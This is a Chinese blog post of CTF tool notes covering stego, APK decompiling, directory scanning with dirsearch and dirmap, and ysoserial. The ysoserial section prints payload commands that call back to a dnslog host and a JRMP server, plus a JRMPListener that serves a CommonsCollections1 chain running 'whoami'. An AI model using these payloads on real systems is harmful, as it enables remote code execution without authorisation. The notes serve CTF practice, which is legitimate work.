<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, shrink-to-fit=no">
    <meta name="referrer" content="origin">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <title>
        
            networktool
        
    </title>
    <link rel="shortcut icon" href="#"/>

    <link type="text/css" rel="stylesheet" href="/font/LongCang.css">
    <link type="text/css" rel="stylesheet" href="/font/Monda.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSansSC.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSerifSC.css">
    <link type="text/css" rel="stylesheet" href="/font/Playball.css">
    <link type="text/css" rel="stylesheet" href="/font/PTMono.css">
    <link type="text/css" rel="stylesheet" href="/font/Roboto.css">
    <link type="text/css" rel="stylesheet" href="/font/RobotoSlab.css">
    <link type="text/css" rel="stylesheet" href="/font/Rosario.css">
    <link type="text/css" rel="stylesheet" href="/font/UbuntuMono.css">

    <link type="text/css" rel="stylesheet" href="/css/base.css">
    <link type="text/css" rel="stylesheet" href="/css/code.css">

    <script type="text/javascript" src="/js/jquery-3.4.1.min.js"></script>
<meta name="generator" content="Hexo 6.3.0"></head>
<body>
    <a id="cover"></a>
    <link type="text/css" rel="stylesheet" href="/css/post.css">
<div id="header" class="header">
    <div class="vertical">
        <div class="inner">
            
                <h1 class="header-subtitle">networktool</h1>
                <div class="header-subinfo">
                    <p class="article-info-text">
                        <span>
                            <i class="iconfont icon-time"></i> 发表时间：2023-12-14
                        </span>
                        
                            <span id="/2023/12/14/networktool/" class="leancloud_visitors" data-flag-title="networktool">
                                <i class="iconfont icon-browse"></i> 阅读：<sapn class="leancloud-visitors-count"></span>
                            </span>
                        
                        <span>
                            <i class="iconfont icon-interactive"></i> 评论：<span class="valine-comment-count" data-xid="/2023/12/14/networktool/"></span>
                        </span>  
                    </p>
                    
                    
                </div>
            
        </div>
    </div>
    
</div>
<div id="container">
    
        <!-- 文章页面 -->
        <div id="article">
            <div class="toc"></div>
            <div class="article-body">
                <h2 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h2><h3 id="图片工具-Stegsolve-montage"><a href="#图片工具-Stegsolve-montage" class="headerlink" title="图片工具 (Stegsolve,montage)"></a>图片工具 (Stegsolve,montage)</h3><ol>
<li>Stegsolve</li>
</ol>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240502235750.png" alt="20240502235750"></p>
<ol start="2">
<li>图片拼接工具montage</li>
</ol>
<p>kail安装</p>
<p><code>apt-get install graphicsmagick-imagemagick-compat</code></p>
<ol start="3">
<li>gaps</li>
</ol>
<p><a target="_blank" rel="noopener" href="https://github.com/nemanja-m/gaps">github项目地址</a></p>
<p>安装完成之后</p>
<p>进入目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install python3-poetry</span><br><span class="line"></span><br><span class="line">sudo apt-get install python-tk</span><br><span class="line"></span><br><span class="line">pip3 install -e . -i https://pypi.tuna.tsinghua.edu.cn/simple</span><br><span class="line"></span><br><span class="line">有报错就跟着报错来</span><br><span class="line"></span><br><span class="line">montage 输入文件路径 -tile 长宽数量 -geometry 拼图间隙 输出路径</span><br><span class="line"> </span><br><span class="line">示例： montage ./*.png -tile 8X6 -geometry +0+0 flag.png </span><br></pre></td></tr></table></figure>



<h2 id="android反汇编工具"><a href="#android反汇编工具" class="headerlink" title="android反汇编工具"></a>android反汇编工具</h2><h3 id="apktool"><a href="#apktool" class="headerlink" title="apktool"></a>apktool</h3><p>简单的使用<br><code>.\apktool.bat d .\attachment-5.apk</code></p>
<p>可以将资源反汇编出来</p>
<h3 id="dex-tools-2-1"><a href="#dex-tools-2-1" class="headerlink" title="dex-tools-2.1"></a>dex-tools-2.1</h3><p>将<code>.apk</code>文件修改为<code>.zip</code>后缀</p>
<p>可以看到文件有<code>classes.dex</code>文件</p>
<p>解压<code>.zip</code>包</p>
<p>使用<code>.\d2j-jar2dex.bat classes.dex</code>反汇编</p>
<h2 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h2><h3 id="dirmap"><a href="#dirmap" class="headerlink" title="dirmap"></a>dirmap</h3><ul>
<li>dirmap介绍</li>
</ul>
<p>一个高级web目录扫描工具，功能将会强于DirBuster、Dirsearch、cansina、御剑</p>
<p><a target="_blank" rel="noopener" href="https://gitcode.com/H4ckForJob/dirmap/overview?utm_source=csdn_github_accelerator&isLogin=1">github加速地址</a></p>
<p>kail下载</p>
<p><code>git clone &quot;https://gitcode.com/H4ckForJob/dirmap.git&quot;</code></p>
<p>缺少什么库，就安装什么库就ok</p>
<p><code>python3 dirmap.py</code>看看可以执行什么命令</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240430223740.png" alt="20240430223740"></p>
<p>发现缺少库<code>pip3 install progressbar2</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240430223855.png" alt="20240430223855"></p>
<p>但是我们也可以直接使用它给的环境需求，打开<code>requirement.txt</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">gevent</span><br><span class="line">requests</span><br><span class="line">progressbar2</span><br><span class="line">lxml</span><br></pre></td></tr></table></figure>

<p><code>pip3 install -r requirement.txt</code></p>
<p>安装成功，</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240430223945.png" alt="20240430223945"></p>
<p>简单使用<br><code>python3 dirmap.py -i &quot;http://ca227535-3252-4560-aacb-cf9837971a8b.node5.buuoj.cn:81/&quot; -lcf</code></p>
<h3 id="dirsearch的使用"><a href="#dirsearch的使用" class="headerlink" title="dirsearch的使用"></a>dirsearch的使用</h3><p>kail使用安装dirsearch</p>
<p><code>apt-get install dirsearch</code></p>
<p>也可以从github上面下载</p>
<p><a target="_blank" rel="noopener" href="https://github.com/maurosoria/dirsearch">dirsearch项目地址</a></p>
<p>常见扫描方式</p>
<p><code>dirsearch  -i 200 -e php -u &quot;http://c5d794be-b35f-47aa-8a22-cbedef633f5e.node5.buuoj.cn:81/&quot;</code></p>
<p>只扫描状态码为200的,一般最好还要添加一个-d的参数，方式访问太快导致一直429</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240429124027.png" alt="20240429124027"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br></pre></td><td class="code"><pre><span class="line">用法：dirsearch.py [-u|--url] 目标 [-e|--extensions] 扩展名 [选项]</span><br><span class="line"></span><br><span class="line">选项:</span><br><span class="line">  --version             显示程序的版本号并退出</span><br><span class="line">  -h, --help            显示此帮助消息并退出</span><br><span class="line"></span><br><span class="line">必需：</span><br><span class="line">  -u URL, --url=URL     目标URL，可以使用多个选项指定多个目标URL</span><br><span class="line">  -l PATH, --urls-file=PATH</span><br><span class="line">                        URL列表文件</span><br><span class="line">  --stdin               从标准输入读取URL</span><br><span class="line">  --cidr=CIDR           目标CIDR</span><br><span class="line">  --raw=PATH            从文件加载原始HTTP请求（使用&#x27;--scheme&#x27;标志设置方案）</span><br><span class="line">  -s SESSION_FILE, --session=SESSION_FILE</span><br><span class="line">                        会话文件</span><br><span class="line">  --config=PATH         配置文件路径（默认为&#x27;DIRSEARCH_CONFIG&#x27;环境变量，否则为&#x27;config.ini&#x27;）</span><br><span class="line"></span><br><span class="line">字典设置:</span><br><span class="line">  -w WORDLISTS, --wordlists=WORDLISTS</span><br><span class="line">                        单词列表文件或包含单词列表文件的目录（以逗号分隔）</span><br><span class="line">  -e EXTENSIONS, --extensions=EXTENSIONS</span><br><span class="line">                        扩展名列表，以逗号分隔（例如：php,asp）</span><br><span class="line">  -f, --force-extensions</span><br><span class="line">                        在每个单词列表条目的末尾添加扩展名。默认情况下，dirsearch只替换%EXT%关键字为扩展名。</span><br><span class="line">  -O, --overwrite-extensions</span><br><span class="line">                        使用指定的扩展名覆盖单词列表中的其他扩展名（通过&#x27;-e&#x27;选择）</span><br><span class="line">  --exclude-extensions=EXTENSIONS</span><br><span class="line">                        排除的扩展名列表，以逗号分隔（例如：asp,jsp）</span><br><span class="line">  --remove-extensions   删除所有路径中的扩展名（例如：admin.php -&gt; admin）</span><br><span class="line">  --prefixes=PREFIXES   将自定义前缀添加到所有单词列表条目中（以逗号分隔）</span><br><span class="line">  --suffixes=SUFFIXES   将自定义后缀添加到所有单词列表条目中，忽略目录（以逗号分隔）</span><br><span class="line">  -U, --uppercase       单词列表转为大写</span><br><span class="line">  -L, --lowercase       单词列表转为小写</span><br><span class="line">  -C, --capital         单词首字母大写</span><br><span class="line"></span><br><span class="line">通用设置:</span><br><span class="line">  -t THREADS, --threads=THREADS</span><br><span class="line">                        线程数</span><br><span class="line">  -r, --recursive       递归地进行强制破解</span><br><span class="line">  --deep-recursive      在每个目录深度上执行递归扫描（例如：api/users -&gt; api/）</span><br><span class="line">  --force-recursive     对找到的每个路径执行递归强制破解，而不仅仅是目录</span><br><span class="line">  -R DEPTH, --max-recursion-depth=DEPTH</span><br><span class="line">                        最大递归深度</span><br><span class="line">  --recursion-status=CODES</span><br><span class="line">                        用于执行递归扫描的有效状态码，支持范围（以逗号分隔）</span><br><span class="line">  --subdirs=SUBDIRS     扫描给定URL的子目录（以逗号分隔）</span><br><span class="line">  --exclude-subdirs=SUBDIRS</span><br><span class="line">                        在递归扫描期间排除以下子目录（以逗号分隔）</span><br><span class="line">  -i CODES, --include-status=CODES</span><br><span class="line">                        包括的状态码，以逗号分隔，支持范围（例如：200,300-399）</span><br><span class="line">  -x CODES, --exclude-status=CODES</span><br><span class="line">                        排除的状态码，以逗号分隔，支持范围（例如：301,500-599）</span><br><span class="line">eg : python dirsearch.py -u &quot;http://node4.anna.nssctf.cn:28694/&quot; -x 404</span><br><span class="line"></span><br><span class="line">                    </span><br><span class="line">  --exclude-sizes=SIZES</span><br><span class="line">                        根据大小排除响应，以逗号分隔（例如：0B,4KB）</span><br><span class="line">  --exclude-text=TEXTS  根据文本排除响应，可以使用多个标志</span><br><span class="line">  --exclude-regex=REGEX</span><br><span class="line">                        根据正则表达式排除响应</span><br><span class="line">  --exclude-redirect=STRING</span><br><span class="line">                        如果此正则表达式（或文本）与重定向URL匹配，则排除响应（例如：&#x27;/index.html&#x27;）</span><br><span class="line">  --exclude-response=PATH</span><br><span class="line">                        排除类似于此页面响应的响应，路径作为输入（例如：404.html）</span><br><span class="line">  --skip-on-status=CODES</span><br><span class="line">                        每当命中这些状态码之一时跳过目标，以逗号分隔，支持范围</span><br><span class="line">  --min-response-size=LENGTH</span><br><span class="line">                        响应的最小长度</span><br><span class="line">  --max-response-size=LENGTH</span><br><span class="line">                        响应的最大长度</span><br><span class="line">  --max-time=SECONDS    扫描的最大运行时间</span><br><span class="line">  --exit-on-error       发生错误时退出</span><br><span class="line"></span><br><span class="line">请求设置:</span><br><span class="line">  -m METHOD, --http-method=METHOD</span><br><span class="line">                        HTTP请求方法（默认为GET）</span><br><span class="line">  -d DATA, --data=DATA  HTTP请求数据</span><br><span class="line">  --data-file=PATH      包含HTTP请求数据的文件</span><br><span class="line">  -H HEADERS, --header=HEADERS</span><br><span class="line">                        HTTP请求标头，可以使用多个标志</span><br><span class="line">  --headers-file=PATH   包含HTTP请求标头的文件</span><br><span class="line">  -F, --follow-redirects</span><br><span class="line">                        跟随HTTP重定向</span><br><span class="line">  --random-agent        每个请求选择一个随机User-Agent</span><br><span class="line">  --auth=CREDENTIAL     认证凭据（例如：user:password或bearer token）</span><br><span class="line">  --auth-type=TYPE      认证类型（basic、digest、bearer、ntlm、jwt）</span><br><span class="line">  --cert-file=PATH      包含客户端证书的文件</span><br><span class="line">  --key-file=PATH       包含客户端证书私钥的文件（未加密）</span><br><span class="line">  --user-agent=USER_AGENT</span><br><span class="line">  --cookie=COOKIE</span><br><span class="line"></span><br><span class="line">连接设置:</span><br><span class="line">  --timeout=TIMEOUT     连接超时时间</span><br><span class="line">  --delay=DELAY         请求之间的延迟</span><br><span class="line">  -p PROXY, --proxy=PROXY</span><br><span class="line">                        代理URL（HTTP/SOCKS），可以使用多个标志</span><br><span class="line">  --proxies-file=PATH   包含代理服务器的文件</span><br><span class="line">  --proxy-auth=CREDENTIAL</span><br><span class="line">                        代理认证凭据</span><br><span class="line">  --replay-proxy=PROXY  用于重放已发现路径的代理</span><br><span class="line">  --tor                 使用Tor网络作为代理</span><br><span class="line">  --scheme=SCHEME       原始请求的协议或URL中没有协议时使用的协议（默认为自动检测）</span><br><span class="line">  --max-rate=RATE       每秒请求数最大值</span><br><span class="line">  --retries=RETRIES     失败请求的重试次数</span><br><span class="line">  --ip=IP               服务器IP地址</span><br><span class="line"></span><br><span class="line">高级设置:</span><br><span class="line">  --crawl               在响应中爬取新路径</span><br><span class="line"></span><br><span class="line">显示设置:</span><br><span class="line">  --full-url            在输出中显示完整URL（在静默模式下自动启用）</span><br><span class="line">  --redirects-history   显示重定向历史记录</span><br><span class="line">  --no-color            不使用彩色输出</span><br><span class="line">  -q, --quiet-mode      安静模式</span><br><span class="line"></span><br><span class="line">输出设置:</span><br><span class="line">  -o PATH/URL, --output=PATH/URL</span><br><span class="line">                        输出文件或MySQL/PostgreSQL数据库URL（格式：</span><br><span class="line">                        scheme://[username:password@]host[:port]/database-</span><br><span class="line">                        name）</span><br><span class="line">  --format=FORMAT       报告格式（可用：simple、plain、json、xml、md、csv、html、</span><br><span class="line">                        sqlite、mysql、postgresql）</span><br><span class="line">  --log=PATH            日志文件</span><br><span class="line"></span><br><span class="line">有关示例配置文件，请参见“config.ini”</span><br></pre></td></tr></table></figure>

<h2 id="Java反序列化工具"><a href="#Java反序列化工具" class="headerlink" title="Java反序列化工具"></a>Java反序列化工具</h2><h3 id="ysoserial"><a href="#ysoserial" class="headerlink" title="ysoserial"></a>ysoserial</h3><p>ysoserial是一款用于生成 利用不安全的Java对象反序列化 的有效负载的概念验证工具</p>
<p><a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial/releases/tag/v0.0.6">github项目地址</a></p>
<p>主要有两种使用方式，一种是运行ysoserial.jar 中的主类函数，另一种是运行ysoserial中的exploit 类，二者的效果是不一样的，一般用第二种方式开启交互服务。</p>
<p>使用方式一<br>官方介绍中的基本用法：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar [payload] &#x27;[command]&#x27;</span><br></pre></td></tr></table></figure>

<p>这种是运行ysoserial中的主类函数：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#发起dnslog请求的payload</span><br><span class="line">java -jar ysoserial.jar URLDNS http://xxx.dnslog.cn/</span><br><span class="line">java -jar ysoserial.jar URLDNS http://xxx.dnslog.cn/ &gt; /tmp/urldns.ser</span><br><span class="line"></span><br><span class="line">#连接1.1.1.1:19999JRMP服务的payload</span><br><span class="line">java -jar ysoserial.jar JRMPClient &quot;1.1.1.1:19999&quot;  &gt; /tmp/jrmp.ser</span><br></pre></td></tr></table></figure>

<p>这一种方法实战就是shiro550</p>
<p>使用方式二<br>最常见用法，即运行ysoserial中的exploit类，一般用于开启交互服务：</p>
<p>exploit类有哪些可以在ysoserial-all\ysoserial\exploit目录下看到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ava命令的-cp参数和-classpath参数是一样的</span><br><span class="line">#1099端口启动一个JRMP监听，等待连接 , 然后执行 cc1链 whoami</span><br><span class="line">java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 &#x27;whoami&#x27;</span><br></pre></td></tr></table></figure>

<p>这种方法的实战就是 CVE-2018-2628<br>Weblogic Server WLS Core Components反序列化命令执行漏洞</p>
<ul>
<li>JRMP<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">JRMP（Java Remote Method Protocol）是Java远程方法调用协议的缩写。它是Java中用于实现分布式对象通信的一种协议。</span><br><span class="line"></span><br><span class="line">在Java中，可以通过远程方法调用（Remote Method Invocation，RMI）来实现不同Java虚拟机（JVM）之间的通信。JRMP是RMI中的默认协议，它定义了在Java平台上进行远程方法调用所使用的协议规范。</span><br><span class="line"></span><br><span class="line">JRMP允许在不同的JVM之间进行对象的远程调用，使得分布式系统中的Java对象可以通过网络进行交互。通过JRMP，客户端可以调用远程服务器上的方法，就像调用本地对象的方法一样。JRMP负责处理网络通信、对象序列化和反序列化等细节，以实现透明的远程方法调用。</span><br><span class="line"></span><br><span class="line">要使用JRMP进行远程方法调用，需要定义接口、实现远程对象、绑定远程对象到特定的端口，并在客户端和服务器端分别设置相应的配置。</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="knowledge"><a href="#knowledge" class="headerlink" title="knowledge"></a>knowledge</h2><h3 id="一次性模拟iPhone和安卓手机"><a href="#一次性模拟iPhone和安卓手机" class="headerlink" title="一次性模拟iPhone和安卓手机"></a>一次性模拟iPhone和安卓手机</h3><p>开始–运行中输入以下命令，启动浏览器：</p>
<p>模拟谷歌Android：</p>
<p>chrome.exe –user-agent&#x3D;”Mozilla&#x2F;5.0 (Linux; U; Android 2.2; en-us; Nexus One Build&#x2F;FRF91) AppleWebKit&#x2F;533.1 (KHTML, like Gecko) Version&#x2F;4.0 Mobile Safari&#x2F;533.1”</p>
<p>模拟苹果iPhone：</p>
<p>chrome.exe –user-agent&#x3D;”Mozilla&#x2F;5.0 (iPad; U; CPU OS 3_2_2 like Mac OS X; en-us) AppleWebKit&#x2F;531.21.10 (KHTML, like Gecko) Version&#x2F;4.0.4 Mobile&#x2F;7B500 Safari&#x2F;531.21.10” </p>

                
                <p class="end">__END__</p>
            </div>
            <div class="article-footer">
                <div class="suffix-box">
    <div class="suffix-box-left">
        <img src="/image/sidebar/-f128e7dd768b5.jpg" alt="懒羊羊">
    </div>
    <div class="suffix-box-right">
        <span class="suffix-box-title">文章作者：</span>懒羊羊
        <br>
        <span class="suffix-box-title">文章出处：</span><a href="/2023/12/14/networktool/" target="_blank">networktool</a>
        <br>
        <span class="suffix-box-title">作者签名：</span>简单地活着, 肆意又精彩.
        <br>
        <span class="suffix-box-title">关于主题：</span><a href="https://github.com/first19326/Hexo-LiveForCode" target="_blank">Hexo - Live For Code</a>
        <br>
        <span class="suffix-box-title">版权声明：</span>文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" title="BY-NC-SA" target="_blank">BY-NC-SA</a> 许可协议，转载请注明出处
        <br>
    </div>
    <div style="clear: both;"></div>
</div>
                
                
                <div class="article-prev-next">
                    
                        <a href="/2024/04/01/JavaScript-Prototype-%E6%B1%A1%E6%9F%93/" class="prev-prefix">« </a> 上一篇：    <a href="/2024/04/01/JavaScript-Prototype-%E6%B1%A1%E6%9F%93/" title="发布于 2024-04-01 09:44">JavaScript Prototype 污染</a>
                        <br>
                    
                    
                        <a href="/2023/12/03/%E5%B7%A5%E5%85%B7/" class="next-prefix">» </a> 下一篇：    <a href="/2023/12/03/%E5%B7%A5%E5%85%B7/" title="发布于 2023-12-03 11:07">工具</a>
                    
                </div>
            </div>
            
    <div class="article-comments">
        
            <div class="comments-title">
                评论列表
            </div>
        
        <div class="comments-content"></div>
    </div>

        </div>
    
</div>
    <div id="footer"></div>
    <div id="sidebar">
    <div class="menu-wrap" style="display:none;">
        
            <div class="menu-notice">
                <span class="iconfont icon-notice"></span>
                <div class="notice">
                    <span>简单地活着，肆意而又精彩！</span>
                </div>
            </div>
        
        <nav class="menu">
            <div class="menu-introduce"> 
                <div class="introduce-avatar">
                    <img src="/image/sidebar/-f128e7dd768b5.jpg">
                </div> 
                <div class="introduce-info"> 
                    <div class="introduce-user"><span>懒羊羊</span></div>
                </div> 
            </div> 
            <div class="menu-list">
                <ul>
                    
                        <li class=""><a href="/" class="" target="_self"><span class="iconfont icon-home-fill"></span>首页</a></li>
                    
                        <li class=""><a href="/category" class="" target="_self"><span class="iconfont icon-folder-fill"></span>分类</a></li>
                    
                        <li class=""><a href="/tag" class="" target="_self"><span class="iconfont icon-discount-fill"></span>标签</a></li>
                    
                        <li class=""><a href="/archive" class="" target="_self"><span class="iconfont icon-calendar-fill"></span>归档</a></li>
                    
                        <li class=""><a href="/donate" class="" target="_self"><span class="iconfont icon-heart-fill"></span>赞赏</a></li>
                    
                        <li class=""><a href="/about" class="" target="_self"><span class="iconfont icon-about-fill"></span>关于</a></li>
                    
                        <li class=""><a href="/atom.xml" class="" target="_blank"><span class="iconfont icon-rss"></span>订阅</a></li>
                    
                        <li class=""><a href="javascript:;" class="search" target="_self"><span class="iconfont icon-search-menu"></span>搜索</a></li>
                    
                        <li class=""><a href="/comment" class="" target="_self"><span class="iconfont icon-comments-fill"></span>留言板</a></li>
                    
                        <li class=""><a href="/friend" class="" target="_self"><span class="iconfont icon-link"></span>友情链接</a></li>
                    
                </ul> 
            </div> 
            <div class="menu-link">
                <div class="box">
                    <div class="image-box"></div>
                </div>
                
                    <a name="知乎" href="https://zhihu.com/people/worstone-29" class="" target="_blank" data=""><span class="iconfont icon-zhihu"></span></a>
                
                    <a name="微博" href="https://weibo.com/u/5749847477" class="" target="_blank" data=""><span class="iconfont icon-weibo"></span></a>
                
                    <a name="QQ" href="javascript:;" class="image" target="_self" data="/image/sidebar/qq.png"><span class="iconfont icon-qq"></span></a>
                
                    <a name="微信" href="javascript:;" class="" target="_self" data=""><span class="iconfont icon-wechat"></span></a>
                
                    <a name="GitHub" href="https://github.com/first19326" class="" target="_blank" data=""><span class="iconfont icon-github"></span></a>
                
            </div> 
        </nav>
        <button class="menu-button-close"></button>
        <div class="morph-shape" id="morph-shape" data-morph-open="M-7.312,0H15c0,0,66,113.339,66,399.5C81,664.006,15,800,15,800H-7.312V0z;M-7.312,0H100c0,0,0,113.839,0,400c0,264.506,0,400,0,400H-7.312V0z">
            <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 100 800" preserveAspectRatio="none">
                <path d="M-7.312,0H0c0,0,0,113.839,0,400c0,264.506,0,400,0,400h-7.312V0z"/>
            </svg>
        </div>
    </div>
    <button class="menu-button-open">MENU</button>
    <div class="menu-cover"></div>
</div>
    <link type="text/css" rel="stylesheet" href="/css/search.css">
<script type="text/javascript" src="/js/iscroll.js"></script>
<script type="text/javascript" src="/js/instantsearch.min.js"></script>
<div class="search-window">
    <div class="search-content">
        <div class="search-content-icon">
            <i class="iconfont icon-search"></i>
        </div>
        <div id="search-input" class="search-input"></div>
    </div>

    <div class="search-scroll">
        <div class="search-result">
            <div id="search-stats" class="search-stats"></div>
            <div id="search-hits"></div>
            <div id="search-pagination" class="search-pagination"></div>
        </div>
    </div>

    <span class="search-close-icon">
        <i class="iconfont icon-close"></i>
    </span>
</div>
    <div id="tools">
    <div class="progressbar-top"></div>

    
        <link type="text/css" rel="stylesheet" href="/css/APlayer.css">
        <script type="text/javascript" src="/js/APlayer.min.js"></script>
        <script type="text/javascript" src="/js/Meting.min.js"></script>
        <meting-js id="3778678" lrcshow="false" server="netease" type="playlist" fixed="true" autoplay="false" loop="all" order="random" preload="auto" volume="0.67" mutex="true"></meting-js>
    
    
    <div class="wrap-right">
        <div class="setting">
            <div class="iconbox favorites" switch="false">
                <span class="iconfont icon-favorites"></span>
                <span class="icontext">关注</span>
            </div>
            <div class="iconbox mode">
                <div class="light">
                    <span class="iconfont icon-daymode"></span>
                    <span class="icontext">浅色模式</span>
                </div>
                <div class="dark">
                    <span class="iconfont icon-nightmode-fill"></span>
                    <span class="icontext">深色模式</span>
                </div>
            </div>
            <a href="javascript:;" target="_self" class="search">
                <div class="iconbox">
                    <span class="iconfont icon-search-menu"></span>
                    <span class="icontext">搜索</span>
                </div>
            </a>
            <div class="iconbox bottom">
                <div style="display: inline-block; transform: rotate(180deg);">
                    <span class="iconfont icon-top"></span>
                </div>
                <span class="icontext">跳至底部</span>
            </div>
        </div>
        <div class="iconbox set">
            <div style="display: inline-block;">
                <span class="iconfont icon-setting"></span>
            </div>
            <span class="icontext">设置</span>
        </div>
        <div class="iconbox top">
            <span class="iconfont icon-top"></span>
            <span class="icontext">返回顶部</span>
        </div>
    </div>
    <div class="loading"></div>
</div>
    <script>
    window.config = {
        GitHubUserName     : "Daylovef",
        GitHubRepositories : "Hexo-LiveForCode",

        User             : "懒羊羊",
        UserAvatar       : "/image/sidebar/-f128e7dd768b5.jpg",
        WebsiteStartDate : "2020-01-01",

        WebsiteTitleBlur         : "(◍´꒳`◍) FYL is my girlfriend",
        WebsiteTitleBlurTimeOut  : 500,
        WebsiteTitleFocus        : "(*´∇｀*) 欢迎回来!",
        WebsiteTitleFocusTimeOut : 1000,
        WebsiteFavicon           : "/image/website/logo.png",

        ProgressBar : {
            id       : "topProgressBar",
            color    : "#77B6FF",
            height   : "2px",
            duration : 0.2
        },

        Loading: {
            rebound : {
                tension  : 16,
                friction : 5
            },
            spinner : {
                id     : "spinner",
                radius : 90,
                sides  : 3,
                depth  : 4,
                colors : {
                    background : "#F0F0F0",
                    stroke     : "#272633",
                    base       : "",
                    child      : "#272633"
                },
                alwaysForward : true,
                restAt        : 0.5,
                renderBase    : false
            }
        },

        HomeHeaderAnimationRendered : true,
        HomeHeaderAnimation         : {
            radius      : 15,
            density     : 0.2,
            color       : "rgba(255, 255, 255, .2)",
            clearOffset : 0.3
        },

        BackAnimationRendered          : true,
        IEBrowserBackAnimationRendered : false,
        BackAnimation                  : {
            colorSaturation  : "60%",
            colorBrightness  : "50%",
            colorAlpha       : 0.5,
            colorCycleSpeed  : 5,
            verticalPosition : "random",
            horizontalSpeed  : 200,
            ribbonCount      : 3,
            strokeSize       : 0,
            parallaxAmount   : -0.2,
            animateSections  : true
        },

        HomeHeaderImage : [
            
                "/image/header/51c6d5c3154ea2f0.jpg",
            
                "/image/header/home.jpg",
            
                "/image/header/home.jpeg",
            
        ],
        HomeBannerText  : "",

        ArticleHeaderImage : [
            
                "/image/header/article.jpg",
            
        ],

        OtherBannerText : "",

        Error : {
            icon    : "icon-swimming",
            title   : "PAGE NOT FOUND",
            content : [
                
